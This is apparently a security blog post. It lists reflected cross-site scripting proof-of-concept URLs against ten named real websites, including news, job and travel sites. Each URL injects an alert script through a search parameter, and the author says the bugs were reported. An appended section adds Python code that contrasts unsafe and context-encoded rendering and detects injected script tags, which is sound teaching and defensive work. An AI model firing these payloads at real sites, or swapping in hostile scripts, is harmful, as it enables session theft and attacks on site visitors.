Pack of xss

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately, even though XSS is old news in the security community and there are well-established techniques to mitigate the attack, it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stayz.com.au
three.com.au
thebigchair.com.au

All XSS vectors displayed here were reported last weekend and some may have been fixed.

Businessday.com.au;

http://www.businessday.com.au/execute_search.html?text='><script>alert('zombies ahead!');</script><&ss=Business

Carsguide.com.au;
(screenshot: carsguide.com.au-xss.png)
http://www.carsguide.com.au/search/?type=all&Ntt=<script>alert('ZOMBIES AHEAD');</script><

Conceptart.org;
(screenshot: conceptart.png)
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C

Investsmart.com.au;
(screenshot: investsmart.com.au-xss.png)
http://www.investsmart.com.au/search/?MainSearch=%22%3E%3Cscript%3Ealert(%22ZOMBIES+AHEAD!%22)%3B%3C%2Fscript%3E%3C

Mycareer.com.au;
(screenshot: mycareer-xss.png)
http://mycareer.com.au/jobseeker/search/results.aspx?s=155&sq=%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C

News.com.au;
(screenshot: news.com.au-xss.png)
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed

Reuters.com;
(screenshot: reuters.com-xss.png)
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C

Stayz.com.au;
(screenshot: stays-xss.png)
http://www.stayz.com.au/search.action
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0

Three.com.au;
(screenshot: shop.three.com.au.png)
http://shop.three.com.au/search/searchResult.jsp?query=%22;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403

Thebigchair.com.au;
(screenshot: thebigchair.com.au-xss.png)
http://thebigchair.com.au/consumer/search/results.aspx?q=%3cscript%3ealert(%27zombies+ahead!%27)%3b%3c%2fscript%3e
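Every vector above is the same bug: a search term reflected into the response without output encoding. The payloads differ only in which context they break out of: `"><script>` closes an HTML attribute, `</title><script>` closes the title element, and `";</script><script>` closes an inline JavaScript string and its script block. The following is an added example, not code from the post or from any of the sites listed. It constructs a minimal search page (hypothetical `render_unsafe` / `render_safe` helpers) that echoes the query into those three contexts, first verbatim and then with context-appropriate encoding, and checks that the decoded query strings from the post no longer inject a second script tag once encoding is applied.

```python
"""
Constructed example (not from the original post): a toy reflected-search
page showing why each output context needs its own encoding.
"""
import html
import json
import re
from urllib.parse import unquote_plus

# URL-decoded copies of three query strings from the post above. These are
# the values the server-side handler receives in the request parameter.
SAMPLE_QUERIES = [
    # attribute-context breakout (reuters.com / investsmart.com.au style)
    unquote_plus("%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C"),
    # <title> breakout (mycareer.com.au / news.com.au style)
    unquote_plus("%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C"),
    # inline-JavaScript string breakout (shop.three.com.au style)
    unquote_plus("%22;%3C/script%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C"),
]


def render_unsafe(q: str) -> str:
    """Reflects q verbatim into a <title>, an attribute value and a JS string.

    This is the pattern behind every URL in the post: the raw parameter is
    concatenated straight into the response.
    """
    return (
        f"<html><head><title>Search: {q}</title></head><body>\n"
        f'<input type="text" name="q" value="{q}">\n'
        f'<script>var lastQuery = "{q}";</script>\n'
        "</body></html>"
    )


def encode_for_js_string(value: str) -> str:
    """Encode value as a JavaScript string literal safe inside a <script> block.

    json.dumps handles quotes, backslashes and control characters, but leaves
    '<' and '>' alone, so "</script>" would still terminate the block. Escaping
    the angle brackets as \\u003c / \\u003e closes that gap.
    """
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(q: str) -> str:
    """Same page, with encoding chosen per context.

    html.escape (quote=True by default) covers element content and quoted
    attribute values; the JavaScript string gets the JS-literal encoder.
    """
    safe_html = html.escape(q)
    return (
        f"<html><head><title>Search: {safe_html}</title></head><body>\n"
        f'<input type="text" name="q" value="{safe_html}">\n'
        f"<script>var lastQuery = {encode_for_js_string(q)};</script>\n"
        "</body></html>"
    )


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def count_script_tags(page: str) -> int:
    """Number of <script> start tags in the rendered page.

    The page template contains exactly one; any extra tag came from the
    reflected parameter, which is the condition a defender wants to detect.
    """
    return len(_SCRIPT_TAG.findall(page))


def reflection_is_exploitable(q: str, renderer) -> bool:
    """True if rendering q with the given renderer injects a script tag."""
    return count_script_tags(renderer(q)) > 1


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(repr(q))
        print("  unsafe render injects script:", reflection_is_exploitable(q, render_unsafe))
        print("  safe render injects script:  ", reflection_is_exploitable(q, render_safe))
```

The check counts script tags rather than searching for the literal payload, because the fix has to hold for any input, not just the strings seen here. Note the JavaScript-context caveat: HTML-escaping a value placed inside a `<script>` block is the wrong encoder, and a JSON encoder alone still lets `</script>` through; the angle-bracket escaping in `encode_for_js_string` is what keeps the script block intact.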

This weblog is licensed under a Creative Commons License.